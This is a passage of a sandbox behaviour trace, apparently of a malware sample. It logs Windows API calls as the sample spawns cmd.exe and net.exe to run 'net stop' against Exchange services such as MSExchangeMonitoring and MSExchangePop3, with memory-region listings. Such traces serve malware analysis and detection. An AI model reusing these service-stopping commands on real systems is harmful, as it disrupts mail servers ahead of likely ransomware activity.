_wcsicmp (_String1="stop", _String2="stop") returned 0 [0138.418] _wcsicmp (_String1="accounts", _String2="MSExchangeMonitoring") returned -12 [0138.418] _wcsicmp (_String1="computer", _String2="MSExchangeMonitoring") returned -10 [0138.418] _wcsicmp (_String1="config", _String2="MSExchangeMonitoring") returned -10 [0138.418] _wcsicmp (_String1="continue", _String2="MSExchangeMonitoring") returned -10 [0138.418] _wcsicmp (_String1="cont", _String2="MSExchangeMonitoring") returned -10 [0138.418] _wcsicmp (_String1="file", _String2="MSExchangeMonitoring") returned -7 [0138.418] _wcsicmp (_String1="files", _String2="MSExchangeMonitoring") returned -7 [0138.418] _wcsicmp (_String1="group", _String2="MSExchangeMonitoring") returned -6 [0138.418] _wcsicmp (_String1="groups", _String2="MSExchangeMonitoring") returned -6 [0138.418] _wcsicmp (_String1="help", _String2="MSExchangeMonitoring") returned -5 [0138.418] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMonitoring") returned -5 [0138.418] _wcsicmp (_String1="localgroup", _String2="MSExchangeMonitoring") returned -1 [0138.418] _wcsicmp (_String1="pause", _String2="MSExchangeMonitoring") returned 3 [0138.418] _wcsicmp (_String1="session", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="sessions", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="sess", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="share", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="start", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="stats", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="statistics", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="stop", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="time", _String2="MSExchangeMonitoring") returned 7 [0138.419] _wcsicmp (_String1="user", _String2="MSExchangeMonitoring") returned 8 [0138.419] _wcsicmp (_String1="users", _String2="MSExchangeMonitoring") returned 8 [0138.419] _wcsicmp (_String1="msg", _String2="MSExchangeMonitoring") returned 2 [0138.419] _wcsicmp (_String1="messenger", _String2="MSExchangeMonitoring") returned -14 [0138.419] _wcsicmp (_String1="receiver", _String2="MSExchangeMonitoring") returned 5 [0138.419] _wcsicmp (_String1="rcv", _String2="MSExchangeMonitoring") returned 5 [0138.419] _wcsicmp (_String1="netpopup", _String2="MSExchangeMonitoring") returned 1 [0138.419] _wcsicmp (_String1="redirector", _String2="MSExchangeMonitoring") returned 5 [0138.419] _wcsicmp (_String1="redir", _String2="MSExchangeMonitoring") returned 5 [0138.419] _wcsicmp (_String1="rdr", _String2="MSExchangeMonitoring") returned 5 [0138.419] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeMonitoring") returned 10 [0138.419] _wcsicmp (_String1="work", _String2="MSExchangeMonitoring") returned 10 [0138.419] _wcsicmp (_String1="wksta", _String2="MSExchangeMonitoring") returned 10 [0138.419] _wcsicmp (_String1="prdr", _String2="MSExchangeMonitoring") returned 3 [0138.419] _wcsicmp (_String1="devrdr", _String2="MSExchangeMonitoring") returned -9 [0138.419] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMonitoring") returned -1 [0138.419] _wcsicmp (_String1="server", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="svr", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="srv", _String2="MSExchangeMonitoring") returned 6 [0138.419] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMonitoring") returned -1 [0138.419] _wcsicmp (_String1="alerter", _String2="MSExchangeMonitoring") returned -12 [0138.419] _wcsicmp (_String1="netlogon", _String2="MSExchangeMonitoring") returned 1 [0138.419] _wcsupr (in: _String="MSExchangeMonitoring" | out: _String="MSEXCHANGEMONITORING") returned="MSEXCHANGEMONITORING" [0138.419] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5263450 [0138.421] GetServiceKeyNameW (in: hSCManager=0x5263450, lpDisplayName="MSEXCHANGEMONITORING", lpServiceName=0x10a8cb0, lpcchBuffer=0xe3f5a4 | out: lpServiceName="", lpcchBuffer=0xe3f5a4) returned 0 [0138.422] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMONITORING") returned 2 [0138.422] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMONITORING") returned -14 [0138.422] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMONITORING") returned 5 [0138.422] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMONITORING") returned 5 [0138.422] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMONITORING") returned 5 [0138.422] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMONITORING") returned 5 [0138.422] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMONITORING") returned 5 [0138.422] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMONITORING") returned 10 [0138.422] _wcsicmp (_String1="work", _String2="MSEXCHANGEMONITORING") returned 10 [0138.422] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMONITORING") returned 10 [0138.422] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMONITORING") returned 3 [0138.422] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMONITORING") returned -9 [0138.422] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMONITORING") returned -1 [0138.422] _wcsicmp (_String1="server", _String2="MSEXCHANGEMONITORING") returned 6 [0138.422] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMONITORING") returned 6 [0138.422] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMONITORING") returned 6 [0138.422] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMONITORING") returned -1 [0138.422] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMONITORING") returned -12 [0138.422] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMONITORING") returned 1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="WORKSTATION") returned -10 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="LanmanWorkstation") returned 1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="SERVER") returned -6 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="LanmanServer") returned 1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="BROWSER") returned 11 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="BROWSER") returned 11 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="MESSENGER") returned 14 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="MESSENGER") returned 14 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="NETRUN") returned -1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="NETRUN") returned -1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="SPOOLER") returned -6 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="SPOOLER") returned -6 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="ALERTER") returned 12 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="ALERTER") returned 12 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="NETLOGON") returned -1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="NETLOGON") returned -1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="NETPOPUP") returned -1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="NETPOPUP") returned -1 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="SQLSERVER") returned -6 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="SQLSERVER") returned -6 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="REPLICATOR") returned -5 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="REPLICATOR") returned -5 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="REMOTEBOOT") returned -5 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="REMOTEBOOT") returned -5 [0138.422] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="TIMESOURCE") returned -7 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="TIMESOURCE") returned -7 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="AFP") returned 12 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="AFP") returned 12 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="UPS") returned -8 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="UPS") returned -8 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="XACTSRV") returned -11 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="XACTSRV") returned -11 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="TCPIP") returned -7 [0138.423] _wcsicmp (_String1="MSEXCHANGEMONITORING", _String2="TCPIP") returned -7 [0138.423] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5266ca0 [0138.423] OpenServiceW (hSCManager=0x5266ca0, lpServiceName="MSEXCHANGEMONITORING", dwDesiredAccess=0x84) returned 0x0 [0138.423] GetLastError () returned 0x424 [0138.423] CloseServiceHandle (hSCObject=0x5266ca0) returned 1 [0138.423] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0138.423] LoadLibraryW (lpLibFileName="NETMSG") returned 0xff0000 [0138.424] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xff0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0138.425] GetFileType (hFile=0x40) returned 0x2 [0138.425] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe3f440 | out: lpMode=0xe3f440) returned 1 [0138.425] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xe3f44c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xe3f44c*=0x1e) returned 1 [0138.426] GetFileType (hFile=0x40) returned 0x2 [0138.426] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe3f440 | out: lpMode=0xe3f440) returned 1 [0138.426] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xe3f44c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xe3f44c*=0x2) returned 1 [0138.426] _ultow (in: _Dest=0x889, _Radix=14939232 | out: _Dest=0x889) returned="2185" [0138.426] FormatMessageW (in: dwFlags=0x2800, lpSource=0xff0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0138.426] GetFileType (hFile=0x40) returned 0x2 [0138.426] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe3f430 | out: lpMode=0xe3f430) returned 1 [0138.426] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xe3f43c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xe3f43c*=0x34) returned 1 [0138.427] GetFileType (hFile=0x40) returned 0x2 [0138.427] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xe3f430 | out: lpMode=0xe3f430) returned 1 [0138.427] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xe3f43c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xe3f43c*=0x2) returned 1 [0138.427] NetApiBufferFree (Buffer=0x5267f70) returned 0x0 [0138.427] NetApiBufferFree (Buffer=0x5267fa0) returned 0x0 [0138.427] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMonitoring" [0138.427] exit (_Code=2) Thread: id = 685 os_tid = 0xffc Process: id = "229" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29f9d000" os_pid = "0xfc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangePop3" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11185 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11186 start_va = 0xdb0000 end_va = 0x4daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 11187 start_va = 0x4db0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 11188 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 11189 start_va = 0x4de0000 end_va = 0x4df3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004de0000" filename = "" Region: id = 11190 start_va = 0x4e00000 end_va = 0x4e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 11191 start_va = 0x4e40000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 11192 start_va = 0x4f40000 end_va = 0x4f43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f40000" filename = "" Region: id = 11193 start_va = 0x4f50000 end_va = 0x4f50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 11194 start_va = 0x4f60000 end_va = 0x4f61fff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 11195 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11196 start_va = 0x7f710000 end_va = 0x7f732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f710000" filename = "" Region: id = 11197 start_va = 0x7f734000 end_va = 0x7f734fff entry_point = 0x0 region_type = private name = "private_0x000000007f734000" filename = "" Region: id = 11198 start_va = 0x7f735000 end_va = 0x7f735fff entry_point = 0x0 region_type = private name = "private_0x000000007f735000" filename = "" Region: id = 11199 start_va = 0x7f73d000 end_va = 0x7f73ffff entry_point = 0x0 region_type = private name = "private_0x000000007f73d000" filename = "" Region: id = 11200 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11201 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11202 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11203 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11204 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11205 start_va = 0x5040000 end_va = 0x504ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 11206 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11207 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11208 start_va = 0x50b0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 11209 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11250 start_va = 0x4db0000 end_va = 0x4dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 11251 start_va = 0x4f70000 end_va = 0x502dfff entry_point = 0x4f70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11252 start_va = 0x5050000 end_va = 0x508ffff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 11253 start_va = 0x51b0000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 11254 start_va = 0x5330000 end_va = 0x533ffff entry_point = 0x0 region_type = private name = "private_0x0000000005330000" filename = "" Region: id = 11255 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11256 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11257 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11258 start_va = 0x7f610000 end_va = 0x7f70ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f610000" filename = "" Region: id = 11259 start_va = 0x7f73a000 end_va = 0x7f73cfff entry_point = 0x0 region_type = private name = "private_0x000000007f73a000" filename = "" Region: id = 11260 start_va = 0x4dc0000 end_va = 0x4dc3fff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 11261 start_va = 0x4dd0000 end_va = 0x4dd3fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 11262 start_va = 0x5340000 end_va = 0x5676fff entry_point = 0x5340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 686 os_tid = 0xfe4 [0138.576] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0138.576] __set_app_type (_Type=0x1) [0138.576] __p__fmode () returned 0x77ac4d6c [0138.576] __p__commode () returned 0x77ac5b1c [0138.576] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0138.576] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0138.577] GetCurrentThreadId () returned 0xfe4 [0138.577] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfe4) returned 0x84 [0138.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0138.577] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0138.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.579] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.579] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4f3fe4c | out: phkResult=0x4f3fe4c*=0x0) returned 0x2 [0138.579] VirtualQuery (in: lpAddress=0x4f3fe53, lpBuffer=0x4f3fe04, dwLength=0x1c | out: lpBuffer=0x4f3fe04*(BaseAddress=0x4f3f000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.579] VirtualQuery (in: lpAddress=0x4e40000, lpBuffer=0x4f3fe04, dwLength=0x1c | out: lpBuffer=0x4f3fe04*(BaseAddress=0x4e40000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0138.579] VirtualQuery (in: lpAddress=0x4e41000, lpBuffer=0x4f3fe04, dwLength=0x1c | out: lpBuffer=0x4f3fe04*(BaseAddress=0x4e41000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0138.579] VirtualQuery (in: lpAddress=0x4e43000, lpBuffer=0x4f3fe04, dwLength=0x1c | out: lpBuffer=0x4f3fe04*(BaseAddress=0x4e43000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.579] VirtualQuery (in: lpAddress=0x4f40000, lpBuffer=0x4f3fe04, dwLength=0x1c | out: lpBuffer=0x4f3fe04*(BaseAddress=0x4f40000, AllocationBase=0x4f40000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0138.579] GetConsoleOutputCP () returned 0x1b5 [0138.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.580] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0138.580] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.580] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0138.580] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.580] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0138.580] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.580] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0138.580] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.580] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0138.581] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.581] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0138.581] GetEnvironmentStringsW () returned 0x50b7d68* [0138.581] FreeEnvironmentStringsA (penv="A") returned 1 [0138.581] GetEnvironmentStringsW () returned 0x50b7d68* [0138.581] FreeEnvironmentStringsA (penv="A") returned 1 [0138.581] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f3edb0 | out: phkResult=0x4f3edb0*=0x94) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x0, lpData=0x4f3edbc*=0xf8, lpcbData=0x4f3edb8*=0x1000) returned 0x2 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x1, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x0, lpData=0x4f3edbc*=0x1, lpcbData=0x4f3edb8*=0x1000) returned 0x2 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x0, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x40, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x40, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x0, lpData=0x4f3edbc*=0x40, lpcbData=0x4f3edb8*=0x1000) returned 0x2 [0138.581] RegCloseKey (hKey=0x94) returned 0x0 [0138.581] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f3edb0 | out: phkResult=0x4f3edb0*=0x94) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x0, lpData=0x4f3edbc*=0x40, lpcbData=0x4f3edb8*=0x1000) returned 0x2 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x1, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x0, lpData=0x4f3edbc*=0x1, lpcbData=0x4f3edb8*=0x1000) returned 0x2 [0138.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x0, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.582] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x9, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.582] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x4, lpData=0x4f3edbc*=0x9, lpcbData=0x4f3edb8*=0x4) returned 0x0 [0138.582] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f3edb4, lpData=0x4f3edbc, lpcbData=0x4f3edb8*=0x1000 | out: lpType=0x4f3edb4*=0x0, lpData=0x4f3edbc*=0x9, lpcbData=0x4f3edb8*=0x1000) returned 0x2 [0138.582] RegCloseKey (hKey=0x94) returned 0x0 [0138.582] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983b [0138.582] srand (_Seed=0x5ad2983b) [0138.582] GetCommandLineW () returned="/c net stop MSExchangePop3" [0138.582] GetCommandLineW () 